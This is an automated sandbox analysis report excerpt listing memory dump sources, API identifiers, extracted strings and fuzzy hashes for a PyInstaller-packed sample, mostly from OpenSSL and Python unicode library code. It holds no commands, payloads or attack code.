                                                                                                                                                                                                                              • Part of subcall function 00007FF602998410: MultiByteToWideChar.KERNEL32(?,?,?,00007FF602993F84,00000000,00007FF602991925), ref: 00007FF602998449
                                                                                                                                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(?,00007FF602997BE7,?,?,FFFFFFFF,00007FF602993834), ref: 00007FF60299777C
                                                                                                                                                                                                                              • Part of subcall function 00007FF6029926C0: MessageBoxW.USER32 ref: 00007FF602992736
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                            • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_puts$O_indentO_printfX509X509_freed2i_
                                                                                                                                                                                                                            • String ID: ------details-----$------------------$<TRAILING GARBAGE AFTER CERTIFICATE>$<UNPARSEABLE CERTIFICATE>$ASN.1Cert, length=%d
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_rsa.c$SSL_use_certificate$ssl_set_cert
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem.c$read_state_machine
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CompareUnicode_$DeallocStringWith
                                                                                                                                                                                                                            • String ID: NFC$NFD$NFKC$NFKD$invalid normalization form
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$ssl_write_internal
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Module_$DeallocObjectObject_$ConstantFromSpecStringTrackTypeType_
                                                                                                                                                                                                                            • String ID: 15.0.0$_ucnhash_CAPI$ucd_3_2_0$unidata_version
                                                                                                                                                                                                                            • API String ID: 2663085338-4141011787
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_new$D_get_sizeDigestFinal_exR_set_debugX_copy_exX_freeX_get0_mdX_new
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$ssl_handshake_hash
                                                                                                                                                                                                                            • API String ID: 474506514-3232504857
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: D_freeD_newD_push_D_push_uintD_to_paramM_freeN_freeN_get_rfc3526_prime_8192X_freeX_new_from_nameY_fromdataY_fromdata_init
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2253699700-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_new$R_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\extensions.c$final_key_share
                                                                                                                                                                                                                            • API String ID: 476316267-2690623152
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_indent$O_printf$O_puts
                                                                                                                                                                                                                            • String ID: No Ticket$ticket$ticket_age_add=%u$ticket_lifetime_hint=%u$ticket_nonce
                                                                                                                                                                                                                            • API String ID: 1353156648-4248733311
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CompareStringUnicode_With$Mem_$FreeMallocSubtypeType_
                                                                                                                                                                                                                            • String ID: NFC$NFD$NFKC$NFKD$invalid normalization form
                                                                                                                                                                                                                            • API String ID: 1723213316-3528878251
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Arg_ArgumentFromStringSubtypeType_Unicode_
                                                                                                                                                                                                                            • String ID: $%04X$a unicode character$argument$decomposition
                                                                                                                                                                                                                            • API String ID: 1318908108-4056541097
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug$R_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$SSL_key_update
                                                                                                                                                                                                                            • API String ID: 3782669924-3423994419
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: T_free$P_resp_count$E_freeL_sk_new_nullP_freeP_get1_ext_d2iP_resp_get0P_response_get1_basicR_newR_set_debugR_set_errorX509_get_ext_d2id2i_
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2948080378-0
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                            • String ID: P%
                                                                                                                                                                                                                            • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: L_sk_free$F_parse_listL_sk_new_nullL_sk_numR_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_ciph.c$set_ciphersuites
                                                                                                                                                                                                                            • API String ID: 1606736437-2539045550
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_f_bufferO_int_ctrlO_newO_push
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$ssl_init_wbio_buffer
                                                                                                                                                                                                                            • API String ID: 1655923927-1860519770
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878127469.00007FFE0CFD1000.00000020.00000001.01000000.0000002B.sdmp, Offset: 00007FFE0CFD0000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 349153199-0
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878605073.00007FFE0E141000.00000020.00000001.01000000.00000028.sdmp, Offset: 00007FFE0E140000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 349153199-0
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878335285.00007FFE0E131000.00000020.00000001.01000000.00000029.sdmp, Offset: 00007FFE0E130000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 349153199-0
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878218664.00007FFE0CFE1000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FFE0CFE0000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 349153199-0
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878001785.00007FFE0CFB1000.00000020.00000001.01000000.0000002C.sdmp, Offset: 00007FFE0CFB0000, based on PE: true
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 349153199-0
                                                                                                                                                                                                                            • Opcode ID: 25c34cf625cfd52ada091fdb65a0fc74a29e9636dd4e47856e36c618d7ae6fa2
                                                                                                                                                                                                                            • Instruction ID: b36dc2e60cc373a4d17fb565cb5bb34bfb2420a10d20f5eb9e5997e0083daa27
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25c34cf625cfd52ada091fdb65a0fc74a29e9636dd4e47856e36c618d7ae6fa2
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E81D125E8C64786FB50AB6E95612BD62D0AF45780F64D035DB0E877B6EF3CE8418703
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878707402.00007FFE0E151000.00000020.00000001.01000000.00000027.sdmp, Offset: 00007FFE0E150000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878689714.00007FFE0E150000.00000002.00000001.01000000.00000027.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878725552.00007FFE0E153000.00000002.00000001.01000000.00000027.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878743319.00007FFE0E155000.00000002.00000001.01000000.00000027.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0e150000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 349153199-0
                                                                                                                                                                                                                            • Opcode ID: 2e347b0b31fdc3b33f3650616a24c4580738b1cdf7c2697dd32cd46ce7f28e42
                                                                                                                                                                                                                            • Instruction ID: 0c8ee5fed206b50fcb84c536904bce7075ff4d8a92888d37dac19a2ac6df65c5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e347b0b31fdc3b33f3650616a24c4580738b1cdf7c2697dd32cd46ce7f28e42
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B81B063F0EA43E6FB52AB6694813B92290AF85780F544537D9DD877B6DF3CE8418700
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878783464.00007FFE0E161000.00000020.00000001.01000000.00000026.sdmp, Offset: 00007FFE0E160000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878762255.00007FFE0E160000.00000002.00000001.01000000.00000026.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878804469.00007FFE0E163000.00000002.00000001.01000000.00000026.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1878824157.00007FFE0E165000.00000002.00000001.01000000.00000026.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0e160000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 349153199-0
                                                                                                                                                                                                                            • Opcode ID: 2e347b0b31fdc3b33f3650616a24c4580738b1cdf7c2697dd32cd46ce7f28e42
                                                                                                                                                                                                                            • Instruction ID: bf547799d02e455383cdb2509bf1dbe618df9eb90857327706515503e7f40fda
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e347b0b31fdc3b33f3650616a24c4580738b1cdf7c2697dd32cd46ce7f28e42
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B81F661F0E243A6FB50AB66A4412B962E0BF96B80F548437D9DD877B7DF3CE8458700
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: L_sk_num$L_sk_pop_freeL_sk_valueR_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_cert.c$ssl_cert_set0_chain
                                                                                                                                                                                                                            • API String ID: 4258318168-2020944375
                                                                                                                                                                                                                            • Opcode ID: 785295854da14665c78a253414d91da37a8c857f00ad98f6eed574386411f58f
                                                                                                                                                                                                                            • Instruction ID: 2fb746ea642566d96fed5d8fc4a31c68f6a7860b03925202b90227ddd18f74c0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 785295854da14665c78a253414d91da37a8c857f00ad98f6eed574386411f58f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6621B621B0C69146E7049B12A4619BAA3A1FF84BD4F440631EE7DC3BEEEF7CE4428700
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875105491.00007FFDFABD0000.00000002.00000001.01000000.00000019.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFABD5000.00000002.00000001.01000000.00000019.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC32000.00000002.00000001.01000000.00000019.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC7E000.00000002.00000001.01000000.00000019.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC82000.00000002.00000001.01000000.00000019.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFAC87000.00000002.00000001.01000000.00000019.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875139625.00007FFDFACDF000.00000002.00000001.01000000.00000019.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875292663.00007FFDFACE2000.00000004.00000001.01000000.00000019.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1875308130.00007FFDFACE4000.00000002.00000001.01000000.00000019.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Arg_$ArgumentCheckDigitErr_FromLongLong_PositionalStringUnicode_
                                                                                                                                                                                                                            • String ID: a unicode character$argument 1$digit$not a digit
                                                                                                                                                                                                                            • API String ID: 4245020737-4278345224
                                                                                                                                                                                                                            • Opcode ID: d2c025be6f32e1fa96eb3f1c6703f3e18d3fbf46a97c983d3ea169cd79d16b21
                                                                                                                                                                                                                            • Instruction ID: c706d9acec37c746bb1740f4a2bd7f8afcdbdec7bfc39a1a9721bae238ef2e4d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d2c025be6f32e1fa96eb3f1c6703f3e18d3fbf46a97c983d3ea169cd79d16b21
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 03217C35B0CA4281EB188B16D864A7923A8FB45B84FD840B6DD6E87BEDDF3DE4458300
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$SSL_enable_ct$SSL_set_ct_validation_callback
                                                                                                                                                                                                                            • API String ID: 1552677711-3628548113
                                                                                                                                                                                                                            • Opcode ID: 277a3b24fac54687f3e9279b456c8ba5a5bee142f3b5f7221e8a3c4580188344
                                                                                                                                                                                                                            • Instruction ID: b901655a7dcdaa0ba0ae4b2fdce6802d92e4b0d4a57355448330259142acfe4f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 277a3b24fac54687f3e9279b456c8ba5a5bee142f3b5f7221e8a3c4580188344
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C8218E61F0964282F76497A1D871BF91390EF84700FD85231DA3CCABDAEE2DE9819710
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 190073905-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: -$:$f$p$p
                                                                                                                                                                                                                            • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                            • String ID: f$f$p$p$f
                                                                                                                                                                                                                            • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878218664.00007FFE0CFE1000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FFE0CFE0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0cfe0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _wassert$memcpy
                                                                                                                                                                                                                            • String ID: ((Nk==4) && (Nr==10)) || ((Nk==6) && (Nr==12)) || ((Nk==8) && (Nr==14))$(idx>=1) && (idx<=10)$src/AESNI.c$src/AESNI.c
                                                                                                                                                                                                                            • API String ID: 4292997394-722309440
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
